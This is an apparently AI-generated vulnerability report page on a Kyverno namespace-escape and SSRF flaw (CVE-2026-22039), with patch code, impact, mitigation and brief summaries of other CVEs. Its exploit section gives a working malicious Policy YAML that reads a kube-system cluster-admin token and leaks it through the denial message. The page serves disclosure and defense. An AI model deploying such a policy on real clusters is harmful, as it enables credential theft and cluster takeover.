CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-22039

The Policeman's Backdoor: Escaping Namespaces in Kyverno (CVE-2026-22039)

Amit Schendel
Amit Schendel
Senior Security Researcher

Jan 28, 2026·5 min read·174 visits

Executive Summary (TL;DR)

Kyverno allows policies to fetch data from the Kubernetes API. Due to missing validation, a user with limited permissions (e.g., confined to a single namespace) could write a policy that asks Kyverno to fetch secrets from the `kube-system` namespace. Since Kyverno runs with cluster-wide privileges, it happily obliges, handing over the keys to the kingdom.

A critical authorization bypass and Server-Side Request Forgery (SSRF) vulnerability in Kyverno's policy engine allows restricted users to leverage the engine's high-privileged ServiceAccount to access or modify resources across the entire Kubernetes cluster.

The Hook: Who Watches the Watchmen?

Kyverno is the self-proclaimed 'police force' of Kubernetes. It's a policy engine designed to validate, mutate, and generate resources. To do its job effectively, the Kyverno ServiceAccount is typically decked out with god-mode permissions—it needs to see everything to police everything.

One of Kyverno's coolest features is the apiCall context provider. It allows a policy to dynamically fetch data from the Kubernetes API server to make smarter decisions. Think of it as a policy saying, "Hey API server, before I let this Pod in, tell me if the ConfigMap it needs actually exists."

But here is the catch: When a user defines a policy in their local, restricted namespace, Kyverno executes that logic using its own high-privileged identity. If Kyverno doesn't carefully check what the user is asking for, it becomes a confused deputy—a powerful entity tricked into doing dirty work for a low-level goon.

The Flaw: Trusting the User's Map

The vulnerability lies in how Kyverno handled apiCall requests defined in namespaced Policy resources (as opposed to ClusterPolicy). The design intent is clear: a policy in the dev namespace should only be able to query resources in the dev namespace.

However, the code responsible for executing these calls failed to validate the urlPath provided by the user. It simply took the path string—variables and all—and fired off an HTTP request to the local API server.

Because Kyverno didn't enforce that the path must align with the policy's namespace, an attacker could supply a path like /api/v1/namespaces/kube-system/secrets. Kyverno, running as a cluster-admin equivalent, would look at the request, nod, and fetch the sensitive data. It’s like locking your front door but leaving the window wide open because you assume only your friends know how to use a ladder.

The Smoking Gun: Code Analysis

Let's look at the fix to understand the breakage. The vulnerability existed in pkg/engine/apicall/apiCall.go. Prior to the patch, the Fetch function was far too trusting. The fix introduces a strict regex check and path cleaning.

Here is the logic introduced in the patch:

// The new sheriff in town: Regex to enforce namespace isolation
var namespacePathRegex = regexp.MustCompile(`^/api(s)?/.*?/namespaces/([^/]+)/?.*$`)
 
// Inside the Fetch() method:
if a.policyNamespace != "" {
    // 1. Sanitize the path to prevent directory traversal (e.g. /namespaces/ns/../)
    cleanPath := path.Clean(call.APICall.URLPath)
    
    // 2. Extract the namespace from the path
    if matches := namespacePathRegex.FindStringSubmatch(cleanPath); len(matches) > 2 {
        ns := matches[2]
        
        // 3. The fatal blow to the exploit: Exact Match Requirement
        if ns != a.policyNamespace {
            return nil, fmt.Errorf("path %s refers to namespace %s, which is different from the policy namespace %s", cleanPath, ns, a.policyNamespace)
        }
    } else {
        // Block cluster-scoped calls entirely for namespaced policies
        return nil, fmt.Errorf("path %s does not contain a namespace segment...", cleanPath)
    }
}

The previous code lacked these three critical checks. It didn't clean the path (allowing ../ traversal), and it didn't compare the requested namespace against the policy's origin namespace.

The Exploit: Stealing the Crown Jewels

Exploitation is trivial and requires no binary wizardry—just a bit of YAML. Imagine you are an attacker with access to the restricted-ns namespace. You want the cluster admin token.

Step 1: Draft the Malicious Policy You create a standard Policy object. In the context variable, you point the apiCall at the forbidden fruit.

apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: pilfer-secrets
  namespace: restricted-ns
spec:
  rules:
  - name: exfiltrate
    match:
      any:
      - resources:
          kinds:
          - Pod
    context:
    - name: admin_secret
      apiCall:
        # The money shot: targeting kube-system from restricted-ns
        urlPath: "/api/v1/namespaces/kube-system/secrets/cluster-admin-token"
        method: GET
    validate:
      message: "Nothing to see here... except {{ admin_secret.data.token }}"
      deny: {}

Step 2: Trigger the Trap You create a dummy Pod in your restricted-ns. Kyverno intercepts the request.

Step 3: Profit Kyverno executes the apiCall as itself. It reads the secret from kube-system. Depending on how you structured the policy, Kyverno either blocks the Pod and prints the secret in the error message (visible to you in the CLI) or logs it to the centralized logging system. Congratulations, you are now Cluster Admin.

The Impact: Why Panic?

This is a CVSS 10.0 for a reason. It completely negates the concept of multi-tenancy in a Kubernetes cluster protected by Kyverno.

If you use Kyverno to enforce security, you have ironically introduced a mechanism to bypass it. An attacker doesn't need to exploit the kernel or find a buffer overflow in the container runtime. They just need permission to create a Policy—a permission often granted to developers so they can manage their own application guardrails.

This flaw allows for:

  1. Information Disclosure: Reading Secrets, ConfigMaps, and environment variables from any namespace.
  2. Privilege Escalation: Modifying RoleBindings or other auth resources if the apiCall supports mutation (PUT/POST/DELETE) and the Kyverno ServiceAccount allows it.
  3. Denial of Service: Deleting critical system resources.

The Fix: Closing the Loophole

The remediation is straightforward: Upgrade. The Kyverno team patched this in versions 1.15.3 and 1.16.3.

The patch forces apiCall paths in namespaced policies to be strictly contained within that namespace. It effectively sandboxes the apiCall logic.

If you cannot upgrade immediately, your only mitigation is to restrict RBAC permissions. Ensure that only trusted cluster administrators have the permission to create or update Policy resources. Regular developers should not be writing their own policies until the patch is applied.

Official Patches

KyvernoOfficial GitHub Security Advisory

Fix Analysis (2)

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Affected Systems

Kyverno < 1.15.3Kyverno 1.16.0Kyverno 1.16.1Kyverno 1.16.2

Affected Versions Detail

Product
Affected Versions
Fixed Version
Kyverno
Kyverno
< 1.15.31.15.3
Kyverno
Kyverno
>= 1.16.0, < 1.16.31.16.3
AttributeDetail
CVSS10.0 (Critical)
Attack VectorNetwork (Kubernetes API)
CWECWE-269 & CWE-918
Exploit StatusPoC Available
ComponentapiCall Context Provider
PrerequisitesPermission to create Policy objects

MITRE ATT&CK Mapping

T1555Credentials from Password Stores
Credential Access
T1068Exploitation for Privilege Escalation
Privilege Escalation
T1613Container and Resource Discovery
Discovery
CWE-269
Improper Privilege Management

Improper Privilege Management & Server-Side Request Forgery (SSRF)

Known Exploits & Detection

GitHub AdvisoryAdvisory containing the explanation of the attack vector

Vulnerability Timeline

Fix commits pushed to repository
2026-01-26
Security Advisory Published
2026-01-27
CVE-2026-22039 Assigned
2026-01-27

References & Sources

  • [1]GHSA-8p9x-46gm-qfx2
  • [2]Kyverno Documentation: apiCall

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 9 hours ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 9 hours ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 10 hours ago•CVE-2026-49754
8.2

CVE-2026-49754: Denial of Service via Unbounded HTTP/2 CONTINUATION Frame Accumulation in Elixir Mint

An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 10 hours ago•CVE-2026-48596
2.1

CVE-2026-48596: Improper Neutralization of CRLF Sequences in Elixir Tesla Multipart HTTP Client

CVE-2026-48596 is an Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Request/Response Splitting, CWE-113) in the Elixir Tesla HTTP client. The flaw resides in how multipart content-type parameters are joined and serialized, enabling attackers to inject arbitrary headers or split HTTP requests when applications pass untrusted inputs to the parameters of multipart uploads.

Alon Barad
Alon Barad
5 views•6 min read
•about 11 hours ago•CVE-2026-48594
8.2

CVE-2026-48594: Decompression Bomb Denial of Service in Elixir Tesla HTTP Client

An improper handling of highly compressed data (decompression bomb) vulnerability exists in the Elixir Tesla HTTP client when utilizing response decompression middlewares. By serving highly compressed responses or stacked content-encoding headers, a malicious server can cause arbitrary heap exhaustion, leading to a denial of service (DoS) crash in the BEAM virtual machine.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 11 hours ago•CVE-2026-48595
8.2

CVE-2026-48595: Cross-Origin Credential Leakage in Elixir Tesla Client via Case-Sensitive Redirect Filter Bypass

A high-severity security vulnerability in Elixir's Tesla HTTP client library (CVE-2026-48595) allows unauthenticated remote attackers to harvest sensitive credentials, including Authorization headers and cookies. The flaw resides in the 'Tesla.Middleware.FollowRedirects' component, which performs case-sensitive lookups when stripping credentials during cross-origin redirects. Because HTTP headers are case-insensitive by RFC specifications, standard canonical casing (e.g., 'Authorization') bypasses the lowercase-only blocklist, leaking tokens to untrusted external redirect destinations.

Alon Barad
Alon Barad
6 views•5 min read